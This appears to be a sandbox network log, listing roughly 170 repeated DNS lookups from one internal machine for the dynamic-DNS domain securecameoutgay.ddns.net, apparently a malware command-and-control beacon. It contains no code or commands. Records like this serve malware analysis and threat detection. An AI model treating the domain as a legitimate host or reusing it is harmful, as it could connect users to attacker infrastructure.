                                                    Oct 12, 2024 23:05:05.048975945 CEST192.168.2.148.8.8.80x7e62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.058847904 CEST192.168.2.148.8.8.80x7e62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.071856022 CEST192.168.2.148.8.8.80x7e62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.080370903 CEST192.168.2.148.8.8.80x7e62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.092087984 CEST192.168.2.148.8.8.80x7af4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.103178024 CEST192.168.2.148.8.8.80x7af4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.113365889 CEST192.168.2.148.8.8.80x7af4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.122598886 CEST192.168.2.148.8.8.80x7af4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.132282019 CEST192.168.2.148.8.8.80x7af4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.144623995 CEST192.168.2.148.8.8.80xf10fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.154732943 CEST192.168.2.148.8.8.80xf10fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.164414883 CEST192.168.2.148.8.8.80xf10fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.173664093 CEST192.168.2.148.8.8.80xf10fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.184315920 CEST192.168.2.148.8.8.80xf10fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.195746899 CEST192.168.2.148.8.8.80x5da3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.204269886 CEST192.168.2.148.8.8.80x5da3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.213994980 CEST192.168.2.148.8.8.80x5da3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.223067999 CEST192.168.2.148.8.8.80x5da3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.232639074 CEST192.168.2.148.8.8.80x5da3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.243865967 CEST192.168.2.148.8.8.80x21f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.252427101 CEST192.168.2.148.8.8.80x21f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.261024952 CEST192.168.2.148.8.8.80x21f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.269664049 CEST192.168.2.148.8.8.80x21f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.280901909 CEST192.168.2.148.8.8.80x21f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.291594028 CEST192.168.2.148.8.8.80x9e42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.299850941 CEST192.168.2.148.8.8.80x9e42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.308594942 CEST192.168.2.148.8.8.80x9e42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.317084074 CEST192.168.2.148.8.8.80x9e42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.326833963 CEST192.168.2.148.8.8.80x9e42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.337384939 CEST192.168.2.148.8.8.80xd400Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.346438885 CEST192.168.2.148.8.8.80xd400Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.355457067 CEST192.168.2.148.8.8.80xd400Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.363899946 CEST192.168.2.148.8.8.80xd400Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.372910976 CEST192.168.2.148.8.8.80xd400Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.383066893 CEST192.168.2.148.8.8.80x44dfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.391854048 CEST192.168.2.148.8.8.80x44dfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.400480986 CEST192.168.2.148.8.8.80x44dfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.408803940 CEST192.168.2.148.8.8.80x44dfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.417254925 CEST192.168.2.148.8.8.80x44dfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.427700043 CEST192.168.2.148.8.8.80xbd58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.436206102 CEST192.168.2.148.8.8.80xbd58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.445071936 CEST192.168.2.148.8.8.80xbd58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.453692913 CEST192.168.2.148.8.8.80xbd58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.462449074 CEST192.168.2.148.8.8.80xbd58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.472671986 CEST192.168.2.148.8.8.80xc52fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.481354952 CEST192.168.2.148.8.8.80xc52fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.490210056 CEST192.168.2.148.8.8.80xc52fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.499286890 CEST192.168.2.148.8.8.80xc52fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.507570982 CEST192.168.2.148.8.8.80xc52fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.518166065 CEST192.168.2.148.8.8.80xf016Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.526608944 CEST192.168.2.148.8.8.80xf016Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.535366058 CEST192.168.2.148.8.8.80xf016Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.544370890 CEST192.168.2.148.8.8.80xf016Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.552663088 CEST192.168.2.148.8.8.80xf016Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.563378096 CEST192.168.2.148.8.8.80xe451Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.572755098 CEST192.168.2.148.8.8.80xe451Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.581435919 CEST192.168.2.148.8.8.80xe451Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.589544058 CEST192.168.2.148.8.8.80xe451Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.598037958 CEST192.168.2.148.8.8.80xe451Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.607559919 CEST192.168.2.148.8.8.80xec4cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.616833925 CEST192.168.2.148.8.8.80xec4cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.624691963 CEST192.168.2.148.8.8.80xec4cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.633121014 CEST192.168.2.148.8.8.80xec4cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.641433001 CEST192.168.2.148.8.8.80xec4cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.651683092 CEST192.168.2.148.8.8.80xe7c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.660058975 CEST192.168.2.148.8.8.80xe7c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.668438911 CEST192.168.2.148.8.8.80xe7c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.677072048 CEST192.168.2.148.8.8.80xe7c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.686016083 CEST192.168.2.148.8.8.80xe7c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.696221113 CEST192.168.2.148.8.8.80x20d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.705130100 CEST192.168.2.148.8.8.80x20d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.715415955 CEST192.168.2.148.8.8.80x20d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.723345995 CEST192.168.2.148.8.8.80x20d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.731656075 CEST192.168.2.148.8.8.80x20d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.741677046 CEST192.168.2.148.8.8.80xdfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.749806881 CEST192.168.2.148.8.8.80xdfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.758606911 CEST192.168.2.148.8.8.80xdfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.767163038 CEST192.168.2.148.8.8.80xdfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.775615931 CEST192.168.2.148.8.8.80xdfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.788512945 CEST192.168.2.148.8.8.80x9ec1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.799537897 CEST192.168.2.148.8.8.80x9ec1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.808121920 CEST192.168.2.148.8.8.80x9ec1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.816668034 CEST192.168.2.148.8.8.80x9ec1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.825500965 CEST192.168.2.148.8.8.80x9ec1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.836411953 CEST192.168.2.148.8.8.80xa8faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.845066071 CEST192.168.2.148.8.8.80xa8faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.853761911 CEST192.168.2.148.8.8.80xa8faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.862281084 CEST192.168.2.148.8.8.80xa8faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.870868921 CEST192.168.2.148.8.8.80xa8faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.881511927 CEST192.168.2.148.8.8.80xd431Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.890727997 CEST192.168.2.148.8.8.80xd431Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.900888920 CEST192.168.2.148.8.8.80xd431Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.911842108 CEST192.168.2.148.8.8.80xd431Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.923538923 CEST192.168.2.148.8.8.80xd431Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.935062885 CEST192.168.2.148.8.8.80x4c6eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.944312096 CEST192.168.2.148.8.8.80x4c6eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.953475952 CEST192.168.2.148.8.8.80x4c6eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.963162899 CEST192.168.2.148.8.8.80x4c6eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.972354889 CEST192.168.2.148.8.8.80x4c6eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.983606100 CEST192.168.2.148.8.8.80xf63Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.993297100 CEST192.168.2.148.8.8.80xf63Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.001945972 CEST192.168.2.148.8.8.80xf63Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.011148930 CEST192.168.2.148.8.8.80xf63Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.020107985 CEST192.168.2.148.8.8.80xf63Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.032243967 CEST192.168.2.148.8.8.80x7e80Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.041173935 CEST192.168.2.148.8.8.80x7e80Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.049833059 CEST192.168.2.148.8.8.80x7e80Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.059639931 CEST192.168.2.148.8.8.80x7e80Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.068909883 CEST192.168.2.148.8.8.80x7e80Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.080183983 CEST192.168.2.148.8.8.80x3799Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.088741064 CEST192.168.2.148.8.8.80x3799Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.098706961 CEST192.168.2.148.8.8.80x3799Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.107939959 CEST192.168.2.148.8.8.80x3799Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.116517067 CEST192.168.2.148.8.8.80x3799Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.128725052 CEST192.168.2.148.8.8.80xcf7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.136619091 CEST192.168.2.148.8.8.80xcf7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.144440889 CEST192.168.2.148.8.8.80xcf7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.152180910 CEST192.168.2.148.8.8.80xcf7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.161082029 CEST192.168.2.148.8.8.80xcf7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.170566082 CEST192.168.2.148.8.8.80x69b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.178636074 CEST192.168.2.148.8.8.80x69b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.185980082 CEST192.168.2.148.8.8.80x69b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.193612099 CEST192.168.2.148.8.8.80x69b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.201212883 CEST192.168.2.148.8.8.80x69b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.212013006 CEST192.168.2.148.8.8.80x3428Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.222146034 CEST192.168.2.148.8.8.80x3428Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.234540939 CEST192.168.2.148.8.8.80x3428Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.243047953 CEST192.168.2.148.8.8.80x3428Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.251399994 CEST192.168.2.148.8.8.80x3428Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.264748096 CEST192.168.2.148.8.8.80x89faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.274250984 CEST192.168.2.148.8.8.80x89faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.288295984 CEST192.168.2.148.8.8.80x89faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.296103954 CEST192.168.2.148.8.8.80x89faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.308204889 CEST192.168.2.148.8.8.80x89faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.324229956 CEST192.168.2.148.8.8.80x12ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.332624912 CEST192.168.2.148.8.8.80x12ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.342051983 CEST192.168.2.148.8.8.80x12ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.351018906 CEST192.168.2.148.8.8.80x12ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.360249043 CEST192.168.2.148.8.8.80x12ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.369856119 CEST192.168.2.148.8.8.80xd4adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.379874945 CEST192.168.2.148.8.8.80xd4adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.391221046 CEST192.168.2.148.8.8.80xd4adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.401904106 CEST192.168.2.148.8.8.80xd4adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.414433002 CEST192.168.2.148.8.8.80xd4adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.435600042 CEST192.168.2.148.8.8.80x1b92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.449306011 CEST192.168.2.148.8.8.80x1b92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.463835001 CEST192.168.2.148.8.8.80x1b92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.474227905 CEST192.168.2.148.8.8.80x1b92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.486855984 CEST192.168.2.148.8.8.80x1b92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.506757975 CEST192.168.2.148.8.8.80xb57aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.515492916 CEST192.168.2.148.8.8.80xb57aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.523753881 CEST192.168.2.148.8.8.80xb57aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.534759998 CEST192.168.2.148.8.8.80xb57aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.545567036 CEST192.168.2.148.8.8.80xb57aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.556862116 CEST192.168.2.148.8.8.80x253aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.566355944 CEST192.168.2.148.8.8.80x253aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.574971914 CEST192.168.2.148.8.8.80x253aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.584902048 CEST192.168.2.148.8.8.80x253aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.594243050 CEST192.168.2.148.8.8.80x253aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.606336117 CEST192.168.2.148.8.8.80xbb2aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.616166115 CEST192.168.2.148.8.8.80xbb2aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.628313065 CEST192.168.2.148.8.8.80xbb2aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.639926910 CEST192.168.2.148.8.8.80xbb2aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.652059078 CEST192.168.2.148.8.8.80xbb2aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.662451029 CEST192.168.2.148.8.8.80x8bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.674024105 CEST192.168.2.148.8.8.80x8bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.682245016 CEST192.168.2.148.8.8.80x8bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.690296888 CEST192.168.2.148.8.8.80x8bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.698421955 CEST192.168.2.148.8.8.80x8bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.707391977 CEST192.168.2.148.8.8.80x75c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.715167046 CEST192.168.2.148.8.8.80x75c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.722976923 CEST192.168.2.148.8.8.80x75c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.731231928 CEST192.168.2.148.8.8.80x75c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.739118099 CEST192.168.2.148.8.8.80x75c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.749183893 CEST192.168.2.148.8.8.80x7c2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.758204937 CEST192.168.2.148.8.8.80x7c2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.766324043 CEST192.168.2.148.8.8.80x7c2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.774923086 CEST192.168.2.148.8.8.80x7c2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.783262014 CEST192.168.2.148.8.8.80x7c2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.793370962 CEST192.168.2.148.8.8.80xf2a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.801984072 CEST192.168.2.148.8.8.80xf2a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.810219049 CEST192.168.2.148.8.8.80xf2a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.818872929 CEST192.168.2.148.8.8.80xf2a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.827920914 CEST192.168.2.148.8.8.80xf2a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.838704109 CEST192.168.2.148.8.8.80xafd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.847804070 CEST192.168.2.148.8.8.80xafd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:06.856703997 CEST192.168.2.148.8.8.80xafd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
